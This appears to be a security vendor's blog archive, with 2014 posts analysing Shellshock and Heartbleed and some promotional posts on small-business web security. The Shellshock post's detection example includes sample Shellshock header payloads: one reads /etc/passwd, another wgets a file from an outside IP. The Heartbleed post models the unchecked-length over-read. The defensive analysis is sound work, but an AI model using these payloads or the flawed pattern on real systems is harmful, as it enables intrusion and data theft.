
26 09, 2014

6Scan Automatically Blocks Shellshock Attack Vectors


Shellshock is out, and it’s exactly the type of threat that reinforces the importance of real-time, proactive, automated security.

6Scan has developed solutions to protect our customers’ websites against Shellshock attack vectors and we will continue to automatically update our active subscribers as new vectors emerge.

Through our patent-pending automated website security we are able to define common attack vectors and filter out malicious traffic designed to exploit websites that are exposed to this vulnerability. As new attack vectors emerge we will continue to update our security in real-time.

Shellshock details

The vulnerability, CVE-2014-6271, is in GNU Bash, the default shell on most Linux and many Unix systems. Bash passes shell functions to child processes through environment variables, and a vulnerable Bash, when it imports such a variable, keeps parsing after the closing brace of the function body and executes whatever follows. Any program that lets a remote party set an environment variable and then runs Bash is therefore exposed. The best-known cases are CGI web applications, where the server copies request headers such as User-Agent into the environment, and SSH servers that restrict users with ForceCommand, where the requested command reaches the shell in SSH_ORIGINAL_COMMAND. The first patch was incomplete (the follow-up is CVE-2014-7169), so check that your distribution's update covers both.
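The two checks a practitioner wants at this point, as an added example that is not 6Scan's filter nor any code from the original post: first, the well-known local probe that runs the installed bash with a crafted exported-function variable in its environment, and second, a filter for the "() {" prefix that a Shellshock payload must carry to be parsed as a function, run over constructed sample HTTP header lines (the variable name SHELLSHOCK_PROBE and the sample headers are invented for the example).

```c
/* Added example, not 6Scan's code. (1) local bash probe for
 * CVE-2014-6271; (2) prefix filter for the "() {" marker applied to
 * constructed sample HTTP headers. */
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Run a command through popen() and capture its first output line (or ""). */
static int first_line(const char *cmd, char *buf, size_t n) {
    FILE *fp = popen(cmd, "r");
    if (fp == NULL) return -1;
    if (fgets(buf, (int)n, fp) == NULL) buf[0] = '\0';
    pclose(fp);
    return 0;
}

/* 1 = the installed bash executes the command appended to an imported
 * function definition (CVE-2014-6271); 0 = it only defines the function;
 * -1 = no usable bash was found, so nothing could be tested. */
int local_bash_is_vulnerable(void) {
    char line[256];
    if (first_line("bash -c 'echo probe' 2>/dev/null", line, sizeof line) < 0 ||
        strncmp(line, "probe", 5) != 0)
        return -1;
    /* The variable name is arbitrary (invented here); only the value matters.
     * A vulnerable bash keeps parsing after the closing brace and runs the echo. */
    setenv("SHELLSHOCK_PROBE", "() { :;}; echo vulnerable", 1);
    first_line("bash -c 'echo test' 2>/dev/null", line, sizeof line);
    unsetenv("SHELLSHOCK_PROBE");
    return strncmp(line, "vulnerable", 10) == 0 ? 1 : 0;
}

/* 1 if a header value starts with "( ) {" (whitespace between the tokens
 * optional). Bash itself only imports a value that begins with exactly
 * "() {", so tolerating extra whitespace can over-flag but never miss. */
int header_looks_like_shellshock(const char *v) {
    while (*v && isspace((unsigned char)*v)) v++;
    if (*v++ != '(') return 0;
    while (*v && isspace((unsigned char)*v)) v++;
    if (*v++ != ')') return 0;
    while (*v && isspace((unsigned char)*v)) v++;
    return *v == '{';
}

/* Constructed sample header lines (not real traffic), as a CGI server
 * would copy them into the script's environment. */
static const char *sample_headers[] = {
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/32.0",
    "User-Agent: () { :;}; /bin/bash -c 'cat /etc/passwd'",
    "Referer: https://example.com/page?q=(){ test }",   /* "(" mid-value: harmless */
    "Cookie: () { :; }; wget http://192.0.2.1/x -O /tmp/x",
    "Accept: text/html,application/xhtml+xml",
};

/* Count the sample headers whose value carries the Shellshock prefix. */
int count_shellshock_headers(void) {
    int hits = 0;
    for (size_t i = 0; i < sizeof sample_headers / sizeof *sample_headers; i++) {
        const char *colon = strchr(sample_headers[i], ':');
        if (colon != NULL && header_looks_like_shellshock(colon + 1))
            hits++;
    }
    return hits;
}

int main(void) {
    int v = local_bash_is_vulnerable();
    printf("local bash: %s\n", v == 1 ? "VULNERABLE" : v == 0 ? "patched" : "not found");
    printf("flagged headers: %d of %zu\n", count_shellshock_headers(),
           sizeof sample_headers / sizeof *sample_headers);
    return 0;
}
```

The filter only looks at the start of the value because that is all Bash looks at: a value such as "session=() { :;}; ..." is never imported as a function, so a rule that fires on "() {" anywhere in a request is noisier than it needs to be, though it is a defensible choice when the cost of a false positive is low.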

The Guardian has a good non-jargon write-up and, as usual, Krebs on Security has good coverage, including this warning:

“The bug is being compared to the recent Heartbleed vulnerability because of its ubiquity and sheer potential for causing havoc on Internet-connected systems — particularly Web sites. Worse yet, experts say the official patch for the security hole is incomplete and could still let attackers seize control over vulnerable systems.”

Stay safe.

8 04, 2014

OpenSSL Heartbleed Bug Analysis

Background

Yesterday the security engineers at Codenomicon (and, independently, Google's Neel Mehta) disclosed a high-severity vulnerability, CVE-2014-0160, in one of the most widely used TLS libraries in the world, OpenSSL.

According to the advisory published on openssl.org, OpenSSL 1.0.1 through 1.0.1f and 1.0.2-beta1 are affected (the 1.0.0 and 0.9.8 branches are not), which means millions of servers. Upgrade to OpenSSL 1.0.1g; if you cannot upgrade immediately, rebuild with -DOPENSSL_NO_HEARTBEATS, which disables the affected extension.

What’s Heartbleed bug?

OpenSSL implements the Transport Layer Security (TLS) and Datagram Transport Layer Security (DTLS) protocols, which are designed to protect traffic from eavesdropping and tampering. The Heartbeat extension (RFC 6520) lets one side send a small payload that the other side echoes back, to keep a connection alive without renegotiating. The vulnerability is in OpenSSL's handling of that extension, which is why the researchers named the bug "Heartbleed".

How the bug behaves

We downloaded the version with the security fix (1.0.1g) and a vulnerable one (1.0.2-beta1), located the function that handles heartbeat messages (tls1_process_heartbeat in ssl/t1_lib.c; its DTLS twin dtls1_process_heartbeat in ssl/d1_both.c has the same bug and the same fix), and diffed the two versions.

[Figure: side-by-side diff of the heartbeat handler]

* Comparison between the vulnerable OpenSSL 1.0.2-beta1 (left) and the fixed 1.0.1g (right)

The comparison tells us a lot about the Heartbleed bug. On the left is the old, vulnerable version:

/* Read type and payload length first */

hbtype = *p++;
n2s(p, payload);
pl = p;

The first line reads the one-byte heartbeat message type. The second reads the two-byte payload length from the message into payload, and the third points pl at the start of the payload data. Nothing compares payload with the number of bytes actually received in the record (s->s3->rrec.length): the length is taken on trust from the remote peer.

/* Allocate memory for the response, size is 1 bytes
* message type, plus 2 bytes payload length, plus
* payload, plus padding
*/
buffer = OPENSSL_malloc(1 + 2 + payload + padding);
bp = buffer;

/* Enter response type, length and copy payload */
*bp++ = TLS1_HB_RESPONSE;
s2n(payload, bp);
memcpy(bp, pl, payload);
bp += payload;
/* Random padding */
RAND_pseudo_bytes(bp, padding);

r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding);

Later in the same function, the code allocates a response buffer sized by that unchecked length, copies payload bytes from pl into it, and sends the result back. A client can therefore claim a payload length of up to 65535 bytes while sending only a handful: memcpy then reads 65535 bytes starting at the received data and continues into whatever sits next to it on the heap, which can include private keys, session cookies, and user names and passwords from other connections. The 1.0.1g fix adds two checks before pl is used: the record must be at least 1 + 2 + 16 bytes long, and 1 + 2 + payload + 16 must not exceed the length of the record actually received; otherwise the message is silently discarded, as RFC 6520 requires.
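To make the over-read concrete, here is an added example that is not OpenSSL's code: a self-contained model of the handler above with the vulnerable logic of 1.0.2-beta1 and the two checks added in 1.0.1g selectable by a flag. The "heap" is a constructed arena with the received record at its start and an invented secret string placed a little past the record's end, so the vulnerable copy stays inside memory the program owns while still showing the leak.

```c
/* Added example, not OpenSSL's code: model of the heartbeat handler with
 * the 1.0.2-beta1 logic and the 1.0.1g bounds checks side by side.
 * Record layout as in the snippet: 1 byte type, 2 bytes payload length
 * (big-endian), payload, then padding. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HB_REQUEST  1   /* TLS1_HB_REQUEST */
#define HB_RESPONSE 2   /* TLS1_HB_RESPONSE */
#define PADDING     16  /* minimum padding per RFC 6520 */

/* Constructed "heap": the record sits at the start of the arena and an
 * unrelated secret sits past its end, as a private key or another
 * client's data might in a real process. Both are invented here. */
#define ARENA_SIZE 4096
static unsigned char arena[ARENA_SIZE];
static const char secret[] = "-----BEGIN PRIVATE KEY----- (constructed)";

/* Write a request into the arena that claims claimed_len payload bytes but
 * carries only real_len; returns the record length actually received. */
size_t build_request(size_t claimed_len, size_t real_len) {
    size_t rec_len = 1 + 2 + real_len + PADDING;
    memset(arena, 0, sizeof arena);
    arena[0] = HB_REQUEST;
    arena[1] = (unsigned char)(claimed_len >> 8);   /* what n2s() will read */
    arena[2] = (unsigned char)(claimed_len & 0xff);
    memset(arena + 3, 'A', real_len);
    memcpy(arena + rec_len + 200, secret, sizeof secret);  /* beyond the record */
    return rec_len;
}

/* fixed != 0 applies the 1.0.1g checks. Returns 1 and fills *out/*out_len
 * with a response, or 0 when the message is discarded. */
static int process_heartbeat(const unsigned char *rec, size_t rec_len, int fixed,
                             unsigned char **out, size_t *out_len) {
    const unsigned char *p = rec, *pl;
    unsigned int payload;
    unsigned char hbtype;

    if (fixed && 1 + 2 + PADDING > rec_len)
        return 0;                               /* silently discard */
    hbtype = *p++;
    payload = (unsigned int)(p[0] << 8 | p[1]); /* n2s(p, payload) */
    p += 2;
    if (fixed && 1 + 2 + payload + PADDING > rec_len)
        return 0;                               /* silently discard, RFC 6520 sec. 4 */
    pl = p;                                     /* vulnerable path: payload unchecked */

    if (hbtype != HB_REQUEST)
        return 0;
    unsigned char *buffer = malloc(1 + 2 + payload + PADDING);
    unsigned char *bp = buffer;
    *bp++ = HB_RESPONSE;
    *bp++ = (unsigned char)(payload >> 8);      /* s2n(payload, bp) */
    *bp++ = (unsigned char)(payload & 0xff);
    memcpy(bp, pl, payload);                    /* over-reads when payload > rec_len - 3 */
    bp += payload;
    memset(bp, 0, PADDING);                     /* stands in for RAND_pseudo_bytes */
    *out = buffer;
    *out_len = 3 + payload + PADDING;
    return 1;
}

/* Send a request claiming 1000 payload bytes while carrying 16 and report
 * whether the secret appears in the response: 1 = leaked, 0 = not. */
int response_leaks_secret(int fixed) {
    unsigned char *resp = NULL;
    size_t resp_len = 0, i;
    size_t rec_len = build_request(1000, 16);   /* 1000 keeps the read inside the arena */
    if (!process_heartbeat(arena, rec_len, fixed, &resp, &resp_len))
        return 0;
    int leaked = 0;
    for (i = 0; i + sizeof secret <= resp_len; i++)
        if (memcmp(resp + i, secret, sizeof secret) == 0) { leaked = 1; break; }
    free(resp);
    return leaked;
}

/* A well-formed request (claimed length matches what was sent) is still
 * echoed by the fixed handler; returns the response length (35) or 0. */
size_t legit_response_len(void) {
    unsigned char *resp = NULL;
    size_t n = 0;
    size_t rec_len = build_request(16, 16);
    if (!process_heartbeat(arena, rec_len, 1, &resp, &n))
        return 0;
    free(resp);
    return n;
}

int main(void) {
    printf("vulnerable handler leaks secret: %d\n", response_leaks_secret(0));
    printf("fixed handler leaks secret:      %d\n", response_leaks_secret(1));
    printf("fixed handler echoes a valid request: %zu bytes\n", legit_response_len());
    return 0;
}
```

In the real library the over-read walks into live heap belonging to the same process, which is why the leaked bytes vary from request to request and why attackers simply repeated the request until something useful came out; the model keeps the read inside its own arena so that it is well-defined and repeatable.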

Conclusion

We highly recommend that all sysadmins check that they are running OpenSSL 1.0.1g and restart every service linked against the library so it picks up the new code. Because private keys may already have been read out of memory, reissue certificates and rotate any keys, session secrets and passwords that passed through the vulnerable servers. The coming weeks will bring plenty of interesting stories about this one; hold tight.

23 02, 2014

Security and Simplicity

We’re excited to announce the addition of Gregor Freund as a 6Scan board advisor. Gregor, who was also a participant in our most recent funding round, brings tremendous security insight and experience as 6Scan continues to grow (250,000+ active websites!) and expand our services.

I’ve known Gregor since 2000, when he was running Zone Labs out of an office jammed between a reggae club and a highway off-ramp.  Gregor had positioned the company as a pioneer in desktop firewalls and freemium security. I was taking on the challenge of expanding the free user base and driving conversion to paid products (some details in this video). Over the next 4 years, Gregor grew the company to 200 employees before selling the business to Check Point.

I learned a lot at Zone Labs, the most enduring lesson being the importance of simplicity. At 6Scan our community is not based on security expertise, it’s based on passion. Our users are passionate about their businesses, their interests and their opinions – and their websites reflect that. And that’s what drives us – simplifying an essential and often complex process so our users can focus on running their businesses. Our community shouldn’t be distracted by security (nor from being victimized by cyber criminals). And that’s our goal in 2014, to keep it simple and, whenever possible, keep it free.

12 11, 2013

How does an attack work?

At 6Scan we’re focused on protecting small businesses against website attacks. One way we protect our customers is by monitoring what requests are being made to their website. When a visitor to your site clicks on a link, they are making a request for the content on that page to be loaded to their browser. When a hacker makes a request to see if they can upload a virus to your website, we catch and categorize it as a malicious request. On your 6Scan dashboard it will show up as ‘Threat’ traffic.

Across all the sites we protect, an average of 7% of requests are malicious. That means a website getting 350 requests a day sees roughly one hack attempt per hour, every hour, every day. This is why it’s important to stay on top of your site security: attackers are always ready to exploit exposed areas.

8 06, 2013

So, who needs web security?

If you run your own website, you need to protect it. It is just like locking your door, installing a car alarm or putting a password on your computer. We’ve all seen recent headlines about cyber attacks on major companies like Sony, LinkedIn, and Facebook. But these kinds of attacks are rare. Large corporate attacks are like someone trying to break into the Louvre to steal the Mona Lisa. This is potentially incredibly lucrative, but it is also incredibly challenging for the thief. Thieves are typically not that ambitious; most theft occurs when the thief sees a combination of opportunity and vulnerability (like breaking into a home, stealing a car or snatching a purse from a pedestrian). In cyber life, we see the same kind of behavior with malicious hackers and small businesses.

According to the 2012 Verizon Data Breach Investigations Report, small businesses are the preferred target for malicious hackers. Criminal hackers who target small businesses don’t do it for the attention; they want to fly below the radar, so they hack into as many sites as possible and steal whatever information they can from the websites they target. And attacks against small businesses are very common. According to 6Scan data, 7% of website requests are malicious, which means that a website receiving 350 daily visits averages one hack attempt per hour, every hour, of every day. Some of these attempts will not be successful, but others may be.

Some of you have been using 6Scan for some time, and you know what it’s about. For those of you who are new to 6Scan, here is a quick summary: 6Scan tells you if your website is vulnerable to attack by hackers and provides the details of your site’s vulnerabilities to you for free. You then have the option to address the exposed areas on your own, or (for the less tech-savvy or time-restricted) you can pay a small subscription fee so that 6Scan can automatically fix vulnerabilities for you and, if necessary, remove malware.

Let’s recap. Who needs website security? Technically, everyone… but small business owners need to be even more careful to not become the target of a mischievous hacker. 6Scan can help give you peace of mind, so that you can continue on with what is important…running your business.